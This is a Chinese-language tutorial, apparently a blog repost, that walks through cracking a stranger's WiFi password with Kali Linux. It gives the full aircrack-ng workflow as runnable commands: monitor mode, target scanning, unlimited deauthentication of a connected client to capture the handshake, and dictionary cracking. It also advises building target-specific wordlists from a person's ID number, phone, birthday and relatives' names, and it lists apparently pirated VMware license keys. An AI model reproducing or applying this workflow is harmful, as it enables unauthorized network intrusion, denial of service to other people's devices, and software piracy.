前言
暴力破解攻擊是指攻擊者通過系統地組合所有可能性(例如登錄時用到的賬戶名、密碼),嘗試所有的可能性破解用戶的賬戶名、密碼等敏感信息。
本文我們采用最原始的暴力破解方式,演示如何破解 WiFi 密碼。
一、什么是暴力破解?
暴力破解就是利用所有可能得字符組密碼,去嘗試破解。這是最原始,粗暴的破解方法,在理想狀態下,最終一定會爆破出密碼。
字符集 密碼位數 密碼可能性 [0-9] 8位 10^8=100000000 [0-9][a-z] 8位 36^8=2821109907456 [0-9][a-z] 1-8位 .............................
但是高達幾千億的密碼種類,這樣的方法顯然不現實,所以出現了字典破解的方式。
字典破解就是通過比較合理的條件,篩選或者過濾掉一些全字符組合的內容,大幅降低爆破的成本。
字典有很多種,比如 Web 網站密碼字典、[WiFi 密碼字典]、操作系統用戶密碼字典、數據庫密碼字典、子域名字典、默認賬號密碼字典、弱口令字典、社工字典等等。
針對我們要破解的 WiFi 密碼,WiFi 密碼字典和社工字典是最好的選擇。
WiFi 密碼字典,顧名思義就是存放大量 WiFi 密碼的字典。
但是 WiFi 密碼字典沒有針對目標本身進行生成,具有普遍性,從而導致無法精準打擊目標。
而社工字典,是通過我們輸入攻擊目標的一些關鍵信息,經過社會工程學的分析,可以針對該目標生成定制化的字典。
假如我對目標的已知信息如下,
- 1.名字
- 2.身份證號
- 3.手機號
- 4.微信號
- 5.QQ 號
- 6.游戲賬號
- 7.各大平臺賬號
- 8.生日
- 9.email
- 10.外號
- 11.親戚朋友戀人名字
- 12.曾經用過的密碼
- 13.… …
通過計算,得到社工字典

推薦字典下載鏈接: https://weakpass.com/download
或者在 github 搜索:字典、dict、wordlist 之類的關鍵詞,有許多字典可以下載。
字典雖多,但由于破解方式的局限性,無法保證隨便找的一個字典就可以破解任意 WiFi。
最好的辦法是社工 + 弱口令。
將社工字典和自己收集的弱口令進行隨機排列組合,擴大命中率。
擁有社工字典之后,我們開始準備暴力破解需要的工具
1.VMware pro16 虛擬機 2.kali-linux 2022 操作系統(搭載在虛擬機中) 3.kali 監聽無限網卡
二、準備破解工具
1.VMware Pro 16 虛擬機安裝
VMware 16密鑰 ZF3R0-FHED2-M80TY-8QYGC-NPKYF YF390-0HF8P-M81RQ-2DXQE-M2UT6 ZF71R-DMX85-08DQY-8YMNC-PPHV8
安裝操作省略
- VMware 安裝 Kali Linux
官網下載鏈接:https://linux.softpedia.com/get/System/Operating-Systems/Linux-Distributions/Kali-Linux-97645.shtml
Kali Linux 安裝教程: http://t.csdn.cn/pWANe
- kali 監聽無限網卡
直接在某寶或某多多搜索:kali 監聽無限網卡
黑客入門必備的工具,非常好用,感興趣的朋友可以入手
三、WiFi 密碼暴力破解
- 虛擬機連接 USB 網卡
首先進入 kali 系統

打開命令行窗口,查看網卡信息
ifconfig

插入準備好的 kali 網卡,選擇連接到虛擬機,選擇 kali

再次檢查網卡信息
ifconfig
出現 wlan0 后證明檢測到無限網卡

啟動網卡,開啟網卡監聽
airmon-ng start wlan0

再次檢查網卡
ifconfig
出現 wlan0mon 后證明網卡監聽服務準備就緒

- 掃描附近 WiFi
airodump-ng wlan0mon
使用 airodump-ng 命令列出無線網卡掃描到的 WiFi 熱點詳細信息,包括信號強度,加密類型,信道等。
這里我們記下要破解 WiFi 的 BSSID 和信道,下圖中我用藍色標記。當搜索到我們想要破解的 WiFi 熱點時可以 Ctrl+C 停止搜索。
這里我們破解 MERCURY_72C0 的網絡密碼
可以看到,該網絡的物理地址為 1A:2B:3C:4D:5E:6F,當前信道為 11
注:安全起見,此處物理地址僅供參考
編造地址為 1A:2B:3C:4D:5E:6F

- 查看目標 WiFi 連接設備
airodump-ng --bssid 1A:2B:3C:4D:5E:6F -c 11 -w /home wlan0mon 注:airodump-ng 列出網絡詳細信息 -c 指定信道,上面已經標記目標網絡的信道 -bssid指定目標路由器的BSSID -w指定抓取的數據包保存的目錄
可以看到,目的網絡下出現了三臺已經連接的設備
我們選擇第一臺設備
物理地址為 12:34:5H:7K:1E:9F

切勿停止該進程
- 抓包
新建一個命令行窗口

輸入命令
aireplay-ng -0 0 -a 1A:2B:3C:4D:5E:6F -c 12:34:5H:7K:1E:9F wlan0mon 注: -0 沖突攻擊模式,使客戶端斷開和路由器的連接 0 攻擊的次數,設置為0代表無限攻擊,導致客戶端一直無法連接路由器 -a 路由器的MAC地址 -c 連接設備的MAC地址
抓取包含 WiFi 密碼的 ACK 握手包

Ctrl+C 退出抓包
返回上個命令行窗口,可以看到第三行,創建文件 / home-10.cap
已經獲得數據包文件

在目錄下找到數據包文件

- 破解
aircrack-ng -w /home/kali/Desktop/password.txt /home-10.cap 注:password.txt 社工字典 home-10.cap 抓包文件
key found[**********] 找到密碼

關閉 wlan 網卡
airmon-ng stop wlan0mon
上面演示的暴力破解 WiFi 密碼說白了就是窮舉法,將密碼字典中每一個密碼依次去與握手包中的密碼進行匹配,直到匹配成功。
所以能否成功破解 wifi 密碼取決于密碼字典本身是否包含了這個密碼。
破解的時間取決于 CPU 的運算速度以及密碼本身的復雜程度。
如果 WiFi 密碼設得足夠復雜,即使有一個非常完美的密碼字典,要想破解成功花上幾周幾個月甚至更久都是有可能的。
安全牛
安全內參
安全牛
安全圈
安全圈
聚銘網絡
CNCERT國家工程研究中心
安全牛
安全圈
關鍵基礎設施安全應急響應中心
系統安全運維
系統安全運維